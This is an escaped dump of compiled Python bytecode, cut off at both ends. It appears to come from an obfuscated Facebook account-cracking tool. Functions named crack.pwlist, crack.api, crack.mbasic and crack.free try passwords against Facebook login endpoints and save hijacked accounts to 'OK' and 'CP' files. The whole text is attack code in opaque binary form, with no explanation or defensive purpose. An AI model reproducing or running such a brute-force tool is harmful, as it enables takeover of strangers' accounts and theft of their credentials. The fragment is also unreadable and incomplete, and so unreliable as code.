xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00|\x03d\x0cv\x00\x90\x01r&t\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x19|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00t\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00|\x02d\x0ev\x00\x90\x01r\xact\x0bd\x0ft\x01t\x02t\x01t\x03f\x04\x16\x00\x83\x01\x01\x00t\x00d\x05t\x01t\x02t\x01t\x03t\x01f\x05\x16\x00\x83\x01}\x03|\x03d\x06v\x00\x90\x01rct\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00|\x03d\nv\x00\x90\x01r\x80t\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x1a|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00|\x03d\x0cv\x00\x90\x01r\x9dt\x0f\x83\x00\x01\x00t\x10d\x0b\x83\x01\xa0\x11|\x00j\x1b|\x00j\x08\xa1\x02\x01\x00t\x13\xa0\x14|\x00j\x15\xa1\x01\x01\x00t\x16\x83\x00\x01\x00d\x00S\x00t\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00t\x0cd\x07t\rt\x02t\rt\x02f\x04\x16\x00\x83\x01\x01\x00t\x0e\x83\x00\x01\x00d\x00S\x00)\x10Nu \x00\x00\x00%s [%s\xe2\x80\xa2%s] %sENTER PASSWORD : r\xdf\x00\x00\x00r\x03\x00\x00\x00r`\x01\x00\x00rT\x00\x00\x00rU\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00u&\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sPOP UP CP OPTIONS [y/n]rb\x01\x00\x00\xe9\x1e\x00\x00\x00re\x01\x00\x00r_\x00\x00\x00r\x8d\x00\x00\x00ra\x01\x00\x00)\x1crk\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00r\xd6\x00\x00\x00r`\x01\x00\x00r\xc6\x00\x00\x00rj\x01\x00\x00ri\x01\x00\x00r\x14\x01\x00\x00rl\x01\x00\x00rP\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00rx\x00\x00\x00rm\x01\x00\x00rn\x01\x00\x00ro\x01\x00\x00rp\x01\x00\x00rM\x00\x00\x00rq\x01\x00\x00rW\x01\x00\x00r}\x00\x00\x00r\xf8\x00\x00\x00rr\x01\x00\x00rs\x01\x00\x00rt\x01\x00\x00ru\x01\x00\x00)\x04rv\x01\x00\x00r\xa1\x00\x00\x00rx\x01\x00\x00ry\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rj\x01\x00\x00\xaf\x03\x00\x00s\x86\x00\x00\x00\x1c\x01\x0e\x01\x0c\x01\n\x02\x12\x01\x06\x01\x16\x01\x04\x01\x08\x01\x14\x01\n\x01\x08\x01\x14\x01\x16\x01\x08\x01\x14\x01\n\x01\x08\x01\x06\x01\x14\x01\x0c\x01\n\x01\x08\x01\x06\x01\x14\x01\x0c\x01\n\x01\x14\x02\n\x01\n\x01\x14\x01\x16\x01\x08\x01\x14\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\x14\x02\n\x01\n\x01\x14\x01\x16\x01\n\x01\x14\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\n\x01\x06\x01\x14\x01\x0c\x01\n\x01\x14\x02\n\x01\x14\x02\n\x01z\x0ccrack.pwlistc\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00s\x88\x02\x00\x00\x90\x01z7|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]\x01}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xcczht\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07t\nd\x0ct\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x10|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q\n\x04\x00t\x12t\x13f\x02y\x93\x01\x00\x01\x00\x01\x00d\x11}\x07d\x11}\x08d\x11}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00t\nd\x12t\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\n|\x03\xa0\x00d\x04\xa1\x01d\x15k\x02\x90\x01r\tt\nd\x16t\x14t\x0ct\x14|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x15\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x17t\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\nq\x07|\x00\x04\x00j\x16d\x187\x00\x02\x00_\x16t\nd\x19t\x14t\x0ct\x14t\x0b|\x00j\x16t\x17|\x00j\x18\x83\x01t\x0bt\x0ct\x17|\x00j\x15\x83\x01t\x0bt\x0ct\x17|\x00j\x0e\x83\x01t\x0bt\x0cf\x0e\x16\x00d\x11d\x1a\x8d\x02\x01\x00t\x19j\x1a\xa0\x1b\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x1c|\x01\xa1\x01\x01\x00Y\x00d\x00S\x00)\x1bNr`\x01\x00\x00r\x87\x00\x00\x00\xfa\x1ahttps://b-api.facebook.comr\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00\xda\x08birthday\xfa\x01/\xf5%\x00\x00\x00\r%s [%sCP%s] %s \xe2\x80\xa2 %s \xe2\x80\xa2 %s %s %s%s\xf5\x10\x00\x00\x00%s\xe2\x80\xa2%s\xe2\x80\xa2%s%s%s\xfa\tCP/%s.txt\xfa\x02a+\xf5\x11\x00\x00\x00%s\xe2\x80\xa2%s\xe2\x80\xa2%s%s%s\nr\x8c\x00\x00\x00\xf5\x1d\x00\x00\x00\r%s [%sCP%s] %s \xe2\x80\xa2 %s%s \xf5\x07\x00\x00\x00%s\xe2\x80\xa2%s\xf5\x08\x00\x00\x00%s\xe2\x80\xa2%s\nr\xeb\x00\x00\x00\xf5\x1c\x00\x00\x00\r%s[%sOK%s] %s \xe2\x80\xa2 %s%s \xfa\tOK/%s.txtr!\x00\x00\x00\xfa2\r%s [%sCRACK%s]%s[%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s\xa9\x01\xda\x03end)\x1drq\x00\x00\x00r\xfa\x00\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00\xda\tbulan_ttlrP\x00\x00\x00rm\x00\x00\x00rl\x00\x00\x00r^\x01\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00\xda\x06tarikhr<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rQ\x00\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00r\xf8\x00\x00\x00\xa9\nrv\x01\x00\x00ri\x01\x00\x00r\xa1\x00\x00\x00\xda\x03log\xda\x02ke\xda\x02tt\xda\x03ttlr_\x01\x00\x00r\x91\x00\x00\x00r\x82\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\xf8\x00\x00\x00\xf8\x03\x00\x00sF\x00\x00\x00\x04\x01\x10\x01\n\x01\x04\x01\x04\xff\x0e\x02\x02\x01&\x01\x0c\x01\x08\x01\x10\x01\x08\x01.\x01 \x01(\x01\x08\x01\x10\x01\x04\x01\x04\x01\x08\x01\x08\x01(\x01\x1a\x01"\x01\x06\x01\x10\x01(\x01\x1a\x01"\x01\x06\x01\x02\x01\x0e\x02P\x01\x06\x01\x10\x01z\tcrack.apic\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00s\x90\x02\x00\x00\x90\x01z;|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]\x05}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xcczht\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07t\nd\x0ct\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x10|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q\x0e\x04\x00t\x12t\x13f\x02y\x93\x01\x00\x01\x00\x01\x00d\x11}\x07d\x11}\x08d\x11}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00t\nd\x12t\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x0e|\x03\xa0\x00d\x04\xa1\x01d\x15k\x02\x90\x01r\rt\nd\x16t\x14t\x15t\x14|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00t\nd\x17\x83\x01\x01\x00|\x00j\x16\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x18t\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x0eq\x07|\x00\x04\x00j\x17d\x197\x00\x02\x00_\x17t\nd\x1at\x14t\x15t\x14t\x0b|\x00j\x17t\x18|\x00j\x19\x83\x01t\x0bt\x15t\x18|\x00j\x16\x83\x01t\x0bt\x15t\x18|\x00j\x0e\x83\x01t\x0bt\x15f\x0e\x16\x00d\x11d\x1b\x8d\x02\x01\x00t\x1aj\x1b\xa0\x1c\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x1d|\x01\xa1\x01\x01\x00Y\x00d\x00S\x00)\x1cNr`\x01\x00\x00r\x87\x00\x00\x00r|\x01\x00\x00r\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00r}\x01\x00\x00r~\x01\x00\x00r\x7f\x01\x00\x00r\x80\x01\x00\x00r\x81\x01\x00\x00r\x82\x01\x00\x00r\x83\x01\x00\x00r\x8c\x00\x00\x00r\x84\x01\x00\x00r\x85\x01\x00\x00r\x86\x01\x00\x00r\xeb\x00\x00\x00r\x87\x01\x00\x00r%\x00\x00\x00r\x88\x01\x00\x00r!\x00\x00\x00r\x89\x01\x00\x00r\x8a\x01\x00\x00)\x1erq\x00\x00\x00r\xfa\x00\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00r\x8c\x01\x00\x00rP\x00\x00\x00rm\x00\x00\x00\xda\x01Kr^\x01\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00r\x8d\x01\x00\x00r<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00rp\x01\x00\x00r\x8e\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rp\x01\x00\x00\x1c\x04\x00\x00sH\x00\x00\x00\x04\x01\x10\x01\n\x01\x04\x01\x04\xff\x0e\x02\x02\x01&\x01\x0c\x01\x08\x01\x10\x01\x08\x01.\x01 \x01(\x01\x08\x01\x10\x01\x04\x01\x04\x01\x08\x01\x08\x01(\x01\x1a\x01"\x01\x06\x01\x10\x01(\x01\x08\x01\x1a\x01"\x01\x06\x01\x02\x01\x0e\x02P\x01\x06\x01\x10\x01z\x0ecrack.api_opsic\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00\xf3\x9a\x02\x00\x00\x90\x01z@|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]\n}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xcczht\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07t\nd\x0ct\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x10|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q\x13\x04\x00t\x12t\x13f\x02y\x93\x01\x00\x01\x00\x01\x00d\x11}\x07d\x11}\x08d\x11}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00t\nd\x12t\x0bt\x0ct\x0b|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00\x83\x01\x01\x00|\x00j\x0e\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0et\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x13|\x03\xa0\x00d\x04\xa1\x01d\x15k\x02\x90\x01r\x12d\x16t\x14t\x15t\x14|\x01\xa0\x00d\x02\xa1\x01|\x02t\r|\x01\xa0\x00d\x02\xa1\x01\x83\x01t\x15f\x07\x16\x00}\nt\x16|\nt\x17|\x03\xa0\x00d\x17\xa1\x01\x83\x01\x83\x02\x01\x00|\x00j\x18\xa0\x0fd\x13|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x18t\x10\x16\x00d\x0f\x83\x02\xa0\x11d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q\x13q\x07|\x00\x04\x00j\x19d\x197\x00\x02\x00_\x19t\nd\x1at\x14t\x15t\x14t\x0b|\x00j\x19t\x1a|\x00j\x1b\x83\x01t\x0bt\x15t\x1a|\x00j\x18\x83\x01t\x0bt\x15t\x1a|\x00j\x0e\x83\x01t\x0bt\x15f\x0e\x16\x00d\x11d\x1b\x8d\x02\x01\x00t\x1cj\x1d\xa0\x1e\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x1f|\x01\xa1\x01\x01\x00Y\x00d\x00S\x00)\x1cNr`\x01\x00\x00r\x87\x00\x00\x00r\n\x00\x00\x00r\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00r}\x01\x00\x00r~\x01\x00\x00r\x7f\x01\x00\x00r\x80\x01\x00\x00r\x81\x01\x00\x00r\x82\x01\x00\x00r\x83\x01\x00\x00r\x8c\x00\x00\x00r\x84\x01\x00\x00r\x85\x01\x00\x00r\x86\x01\x00\x00r\xeb\x00\x00\x00\xf5\x1e\x00\x00\x00\r%s[%sOK%s] %s \xe2\x80\xa2 %s%s%s r\x11\x01\x00\x00r\x88\x01\x00\x00r!\x00\x00\x00r\x89\x01\x00\x00r\x8a\x01\x00\x00) rq\x00\x00\x00r\x1e\x01\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00r\x8c\x01\x00\x00rP\x00\x00\x00rm\x00\x00\x00r\x93\x01\x00\x00r^\x01\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00r\x8d\x01\x00\x00r<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rX\x01\x00\x00rT\x01\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00rs\x01\x00\x00\xa9\x0brv\x01\x00\x00ri\x01\x00\x00r\xa1\x00\x00\x00r\x8f\x01\x00\x00r\x90\x01\x00\x00r\x91\x01\x00\x00r\x92\x01\x00\x00r_\x01\x00\x00r\x91\x00\x00\x00r\x82\x00\x00\x00rV\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rs\x01\x00\x00A\x04\x00\x00\xf3H\x00\x00\x00\x04\x01\x10\x01\n\x01\x04\x01\x04\xff\x0e\x02\x02\x01&\x01\x0c\x01\x08\x01\x10\x01\x08\x01.\x01 \x01(\x01\x08\x01\x10\x01\x04\x01\x04\x01\x08\x01\x08\x01(\x01\x1a\x01"\x01\x06\x01\x10\x01&\x01\x14\x01\x1a\x01"\x01\x06\x01\x02\x01\x0e\x02P\x01\x06\x01\x10\x01z\x0ccrack.mbasicc\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00s\xce\x02\x00\x00\x90\x01zZ|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]$}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xe2zst\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x04j\x07\xa1\x01}\x05|\x05d\n\x19\x00}\x06|\x06\xa0\x08d\x0b\xa1\x01\\\x03}\x07}\x08}\tt\t|\x07\x19\x00}\x07d\x0ct\nt\x0bt\n|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tt\x0c|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\t\x16\x00}\nt\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\n\x83\x03\x01\x00t\x0ed\r\x83\x01\x01\x00|\x00j\x0f\xa0\x10d\x0e|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00t\x03d\x0ft\x11\x16\x00d\x10\x83\x02\xa0\x12d\x11|\x01\xa0\x00d\x02\xa1\x01|\x02|\x08|\x07|\tf\x05\x16\x00\xa1\x01\x01\x00W\x00\x01\x00\x90\x01q-\x04\x00t\x13t\x14f\x02y\x9e\x01\x00\x01\x00\x01\x00d\x12}\x07d\x12}\x08d\x12}\tY\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00d\x13t\nt\x15t\n|\x01\xa0\x00d\x02\xa1\x01|\x02t\x0c|\x01\xa0\x00d\x02\xa1\x01\x83\x01f\x06\x16\x00}\nt\r|\x01\xa0\x00d\x02\xa1\x01|\x02|\n\x83\x03\x01\x00t\x0ed\r\x83\x01\x01\x00|\x00j\x0f\xa0\x10d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x0ft\x11\x16\x00d\x10\x83\x02\xa0\x12d\x15|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q-|\x03\xa0\x00d\x04\xa1\x01d\x16k\x02\x90\x01r,d\x17t\x16t\x15t\x16|\x01\xa0\x00d\x02\xa1\x01|\x02t\x0c|\x01\xa0\x00d\x02\xa1\x01\x83\x01t\x15f\x07\x16\x00}\x0bt\x17|\x0bt\x18|\x03\xa0\x00d\x18\xa1\x01\x83\x01\x83\x02\x01\x00t\x0ed\r\x83\x01\x01\x00|\x00j\x19\xa0\x10d\x14|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00t\x03d\x19t\x11\x16\x00d\x10\x83\x02\xa0\x12d\x15|\x01\xa0\x00d\x02\xa1\x01|\x02f\x02\x16\x00\xa1\x01\x01\x00\x01\x00\x90\x01q-q\x07|\x00\x04\x00j\x1ad\x1a7\x00\x02\x00_\x1at\x0ed\x1bt\x16t\x15t\x16t\n|\x00j\x1at\x1b|\x00j\x1c\x83\x01t\nt\x15t\x1b|\x00j\x19\x83\x01t\nt\x15t\x1b|\x00j\x0f\x83\x01t\nt\x15f\x0e\x16\x00d\x12d\x1c\x8d\x02\x01\x00t\x1dj\x1e\xa0\x1f\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0 |\x01\xa1\x01\x01\x00Y\x00d\x00S\x00)\x1dNr`\x01\x00\x00r\x87\x00\x00\x00r\n\x00\x00\x00r\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00r}\x01\x00\x00r~\x01\x00\x00r\x7f\x01\x00\x00r%\x00\x00\x00r\x80\x01\x00\x00r\x81\x01\x00\x00r\x82\x01\x00\x00r\x83\x01\x00\x00r\x8c\x00\x00\x00r\x84\x01\x00\x00r\x85\x01\x00\x00r\x86\x01\x00\x00r\xeb\x00\x00\x00r\x95\x01\x00\x00r\x11\x01\x00\x00r\x88\x01\x00\x00r!\x00\x00\x00r\x89\x01\x00\x00r\x8a\x01\x00\x00)!rq\x00\x00\x00r\x1e\x01\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00r\x8c\x01\x00\x00rm\x00\x00\x00r\x93\x01\x00\x00r^\x01\x00\x00rO\x01\x00\x00rP\x00\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00r\x8d\x01\x00\x00r<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rl\x00\x00\x00rQ\x00\x00\x00rX\x01\x00\x00rT\x01\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00rr\x01\x00\x00\xa9\x0crv\x01\x00\x00ri\x01\x00\x00r\xa1\x00\x00\x00r\x8f\x01\x00\x00r\x90\x01\x00\x00r\x91\x01\x00\x00r\x92\x01\x00\x00r_\x01\x00\x00r\x91\x00\x00\x00r\x82\x00\x00\x00rD\x01\x00\x00rV\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rr\x01\x00\x00f\x04\x00\x00\xf3R\x00\x00\x00\x04\x01\x10\x01\n\x01\x04\x01\x04\xff\x0e\x02\x02\x01&\x01\x0c\x01\x08\x01\x10\x01\x08\x01*\x01\x12\x01\x08\x01 \x01(\x01\x08\x01\x10\x01\x04\x01\x04\x01\x08\x01\x08\x01$\x01\x12\x01\x08\x01\x1a\x01"\x01\x06\x01\x10\x01&\x01\x14\x01\x08\x01\x1a\x01"\x01\x06\x01\x02\x01\x0e\x02P\x01\x06\x01\x10\x01z\x11crack.mbasic_opsic\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00r\x94\x01\x00\x00)\x1cNr`\x01\x00\x00r\x87\x00\x00\x00\xfa\x19https://free.facebook.comr\xed\x00\x00\x00r\xef\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00r}\x01\x00\x00r~\x01\x00\x00r\x7f\x01\x00\x00r\x80\x01\x00\x00r\x81\x01\x00\x00r\x82\x01\x00\x00r\x83\x01\x00\x00r\x8c\x00\x00\x00r\x84\x01\x00\x00r\x85\x01\x00\x00r\x86\x01\x00\x00r\xeb\x00\x00\x00r\x95\x01\x00\x00r\x11\x01\x00\x00r\x88\x01\x00\x00r!\x00\x00\x00r\x89\x01\x00\x00r\x8a\x01\x00\x00) rq\x00\x00\x00r \x01\x00\x00rp\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\xd6\x00\x00\x00r\x8c\x01\x00\x00rP\x00\x00\x00rm\x00\x00\x00r\x93\x01\x00\x00r^\x01\x00\x00r\xef\x00\x00\x00r\xc5\x00\x00\x00r\x8d\x01\x00\x00r<\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rX\x01\x00\x00rT\x01\x00\x00rf\x01\x00\x00rg\x01\x00\x00r\xc6\x00\x00\x00ri\x01\x00\x00r:\x00\x00\x00r;\x00\x00\x00r=\x00\x00\x00ru\x01\x00\x00r\x96\x01\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00ru\x01\x00\x00\x90\x04\x00\x00r\x97\x01\x00\x00z\ncrack.freec\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x10\x00\x00\x00C\x00\x00\x00s\xce\x02\x00\x00\x90\x01zZ|\x01\xa0\x00d\x01\xa1\x01D\x00\x90\x01]$}\x02t\x01|\x01\xa0\x00d\x02\xa1\x01|\x02d\x03\x83\x03}\x03|\x03\xa0\x00d\x04\xa1\x01d\x05k\x02r\xe2zst\x02\xa0\x00d\x06|\x01\xa0\x00d\x02\xa1\x01\x17\x00d\x07\x17\x00t\x03d\x08d\t\x83\x02\xa0\x04\xa1\x00\x17\x00\xa1\x01}\x04t\x05\xa0\x06|\x